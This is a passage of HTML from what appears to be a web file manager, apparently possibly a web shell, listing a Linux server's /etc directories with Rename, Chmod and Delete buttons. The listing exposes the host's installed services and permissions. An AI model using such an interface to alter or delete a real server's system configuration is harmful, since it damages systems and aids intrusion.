                                <button onclick="showChmod('/etc/firewall','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/firewall',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="firewalld">
                            <td><a href="?p=%2Fetc%2Ffirewalld" class="folder-link">📁 firewalld</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0750</span></td>
                            <td>2026-08-04 20:19</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/firewalld','firewalld')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/firewalld','0750')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/firewalld',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="flatpak">
                            <td><a href="?p=%2Fetc%2Fflatpak" class="folder-link">📁 flatpak</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-28 21:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/flatpak','flatpak')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/flatpak','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/flatpak',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="fonts">
                            <td><a href="?p=%2Fetc%2Ffonts" class="folder-link">📁 fonts</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:06</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/fonts','fonts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/fonts','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/fonts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gcrypt">
                            <td><a href="?p=%2Fetc%2Fgcrypt" class="folder-link">📁 gcrypt</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-04 20:37</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/gcrypt','gcrypt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gcrypt','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gcrypt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="geoclue">
                            <td><a href="?p=%2Fetc%2Fgeoclue" class="folder-link">📁 geoclue</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/geoclue','geoclue')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/geoclue','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/geoclue',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="glvnd">
                            <td><a href="?p=%2Fetc%2Fglvnd" class="folder-link">📁 glvnd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/glvnd','glvnd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/glvnd','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/glvnd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gnupg">
                            <td><a href="?p=%2Fetc%2Fgnupg" class="folder-link">📁 gnupg</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-01-15 21:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/gnupg','gnupg')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gnupg','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gnupg',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="groff">
                            <td><a href="?p=%2Fetc%2Fgroff" class="folder-link">📁 groff</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-02-25 15:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/groff','groff')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/groff','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/groff',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="grub.d">
                            <td><a href="?p=%2Fetc%2Fgrub.d" class="folder-link">📁 grub.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0700</span></td>
                            <td>2026-05-27 09:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/grub.d','grub.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/grub.d','0700')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/grub.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gss">
                            <td><a href="?p=%2Fetc%2Fgss" class="folder-link">📁 gss</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-20 23:47</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/gss','gss')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gss','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gss',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gssproxy">
                            <td><a href="?p=%2Fetc%2Fgssproxy" class="folder-link">📁 gssproxy</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/gssproxy','gssproxy')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gssproxy','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gssproxy',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gt">
                            <td><a href="?p=%2Fetc%2Fgt" class="folder-link">📁 gt</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-03-19 20:20</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/gt','gt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gt','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="httpd">
                            <td><a href="?p=%2Fetc%2Fhttpd" class="folder-link">📁 httpd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/httpd','httpd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/httpd','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/httpd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="incron.d">
                            <td><a href="?p=%2Fetc%2Fincron.d" class="folder-link">📁 incron.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2023-05-12 17:25</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/incron.d','incron.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/incron.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/incron.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="init.d">
                            <td><a href="?p=%2Fetc%2Finit.d" class="folder-link">📁 init.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-26 09:19</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/init.d','init.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/init.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/init.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="iproute2">
                            <td><a href="?p=%2Fetc%2Fiproute2" class="folder-link">📁 iproute2</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-27 09:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/iproute2','iproute2')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/iproute2','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/iproute2',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="iscsi">
                            <td><a href="?p=%2Fetc%2Fiscsi" class="folder-link">📁 iscsi</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-11 21:35</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/iscsi','iscsi')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/iscsi','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/iscsi',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="issue.d">
                            <td><a href="?p=%2Fetc%2Fissue.d" class="folder-link">📁 issue.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/issue.d','issue.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/issue.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/issue.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="kdump">
                            <td><a href="?p=%2Fetc%2Fkdump" class="folder-link">📁 kdump</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-08 18:11</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/kdump','kdump')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/kdump','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/kdump',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="kernel">
                            <td><a href="?p=%2Fetc%2Fkernel" class="folder-link">📁 kernel</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/kernel','kernel')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/kernel','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/kernel',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="keys">
                            <td><a href="?p=%2Fetc%2Fkeys" class="folder-link">📁 keys</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-11-18 19:21</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/keys','keys')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/keys','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/keys',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="keyutils">
                            <td><a href="?p=%2Fetc%2Fkeyutils" class="folder-link">📁 keyutils</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2023-04-05 19:15</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/keyutils','keyutils')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/keyutils','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/keyutils',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="krb5.conf.d">
                            <td><a href="?p=%2Fetc%2Fkrb5.conf.d" class="folder-link">📁 krb5.conf.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-20 23:47</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/krb5.conf.d','krb5.conf.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/krb5.conf.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/krb5.conf.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ld.so.conf.d">
                            <td><a href="?p=%2Fetc%2Fld.so.conf.d" class="folder-link">📁 ld.so.conf.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-03 10:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ld.so.conf.d','ld.so.conf.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ld.so.conf.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ld.so.conf.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libibverbs.d">
                            <td><a href="?p=%2Fetc%2Flibibverbs.d" class="folder-link">📁 libibverbs.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-27 09:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/libibverbs.d','libibverbs.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libibverbs.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libibverbs.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libnl">
                            <td><a href="?p=%2Fetc%2Flibnl" class="folder-link">📁 libnl</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-03-17 12:12</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/libnl','libnl')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libnl','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libnl',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libpaper.d">
                            <td><a href="?p=%2Fetc%2Flibpaper.d" class="folder-link">📁 libpaper.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2022-02-10 01:15</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/libpaper.d','libpaper.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libpaper.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libpaper.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libreport">
                            <td><a href="?p=%2Fetc%2Flibreport" class="folder-link">📁 libreport</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-11-18 19:21</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/libreport','libreport')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libreport','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libreport',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="libssh">
                            <td><a href="?p=%2Fetc%2Flibssh" class="folder-link">📁 libssh</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-06 02:28</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/libssh','libssh')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/libssh','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/libssh',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="lldpd.d">
                            <td><a href="?p=%2Fetc%2Flldpd.d" class="folder-link">📁 lldpd.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/lldpd.d','lldpd.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/lldpd.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/lldpd.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="logrotate.d">
                            <td><a href="?p=%2Fetc%2Flogrotate.d" class="folder-link">📁 logrotate.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-19 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/logrotate.d','logrotate.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/logrotate.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/logrotate.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mail">
                            <td><a href="?p=%2Fetc%2Fmail" class="folder-link">📁 mail</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/mail','mail')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mail','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mail',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mercurial">
                            <td><a href="?p=%2Fetc%2Fmercurial" class="folder-link">📁 mercurial</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:03</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/mercurial','mercurial')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mercurial','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mercurial',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="microcode_ctl">
                            <td><a href="?p=%2Fetc%2Fmicrocode_ctl" class="folder-link">📁 microcode_ctl</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-11 16:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/microcode_ctl','microcode_ctl')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/microcode_ctl','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/microcode_ctl',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="modprobe.d">
                            <td><a href="?p=%2Fetc%2Fmodprobe.d" class="folder-link">📁 modprobe.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-08 09:56</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/modprobe.d','modprobe.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/modprobe.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/modprobe.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="modulefiles">
                            <td><a href="?p=%2Fetc%2Fmodulefiles" class="folder-link">📁 modulefiles</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-21 09:06</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/modulefiles','modulefiles')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/modulefiles','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/modulefiles',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="modules-load.d">
                            <td><a href="?p=%2Fetc%2Fmodules-load.d" class="folder-link">📁 modules-load.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/modules-load.d','modules-load.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/modules-load.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/modules-load.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="monit.d">
                            <td><a href="?p=%2Fetc%2Fmonit.d" class="folder-link">📁 monit.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-06 10:36</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/monit.d','monit.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/monit.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/monit.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="motd.d">
                            <td><a href="?p=%2Fetc%2Fmotd.d" class="folder-link">📁 motd.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-04 23:44</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/motd.d','motd.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/motd.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/motd.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="my.cnf.d">
                            <td><a href="?p=%2Fetc%2Fmy.cnf.d" class="folder-link">📁 my.cnf.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-04 22:11</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/my.cnf.d','my.cnf.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/my.cnf.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/my.cnf.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named">
                            <td><a href="?p=%2Fetc%2Fnamed" class="folder-link">📁 named</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0750</span></td>
                            <td>2026-08-13 11:36</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/named','named')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named','0750')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nftables">
                            <td><a href="?p=%2Fetc%2Fnftables" class="folder-link">📁 nftables</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0700</span></td>
                            <td>2026-06-03 10:57</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/nftables','nftables')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nftables','0700')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nftables',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ntp">
                            <td><a href="?p=%2Fetc%2Fntp" class="folder-link">📁 ntp</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ntp','ntp')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ntp','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ntp',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nxlog">
                            <td><a href="?p=%2Fetc%2Fnxlog" class="folder-link">📁 nxlog</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/nxlog','nxlog')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nxlog','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nxlog',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nxlog.d">
                            <td><a href="?p=%2Fetc%2Fnxlog.d" class="folder-link">📁 nxlog.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/nxlog.d','nxlog.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nxlog.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nxlog.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="openldap">
                            <td><a href="?p=%2Fetc%2Fopenldap" class="folder-link">📁 openldap</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-03-13 12:29</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/openldap','openldap')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/openldap','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/openldap',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="opt">
                            <td><a href="?p=%2Fetc%2Fopt" class="folder-link">📁 opt</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-10-02 21:00</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/opt','opt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/opt','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/opt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="oracle-cloud-agent">
                            <td><a href="?p=%2Fetc%2Foracle-cloud-agent" class="folder-link">📁 oracle-cloud-agent</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0750</span></td>
                            <td>2025-09-01 07:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/oracle-cloud-agent','oracle-cloud-agent')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/oracle-cloud-agent','0750')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/oracle-cloud-agent',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="osquery">
                            <td><a href="?p=%2Fetc%2Fosquery" class="folder-link">📁 osquery</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-24 17:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/osquery','osquery')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/osquery','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/osquery',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ostree">
                            <td><a href="?p=%2Fetc%2Fostree" class="folder-link">📁 ostree</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-09 00:26</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ostree','ostree')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ostree','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ostree',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pam.d">
                            <td><a href="?p=%2Fetc%2Fpam.d" class="folder-link">📁 pam.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-18 03:35</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pam.d','pam.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pam.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pam.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pcp">
                            <td><a href="?p=%2Fetc%2Fpcp" class="folder-link">📁 pcp</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:05</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pcp','pcp')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pcp','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pcp',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pkcs11">
                            <td><a href="?p=%2Fetc%2Fpkcs11" class="folder-link">📁 pkcs11</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-03 14:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pkcs11','pkcs11')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pkcs11','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pkcs11',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pkgconfig">
                            <td><a href="?p=%2Fetc%2Fpkgconfig" class="folder-link">📁 pkgconfig</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:01</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pkgconfig','pkgconfig')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pkgconfig','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pkgconfig',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pki">
                            <td><a href="?p=%2Fetc%2Fpki" class="folder-link">📁 pki</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:03</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pki','pki')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pki','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pki',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pm">
                            <td><a href="?p=%2Fetc%2Fpm" class="folder-link">📁 pm</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-11-18 19:21</td>
                            <td><div class="actions">
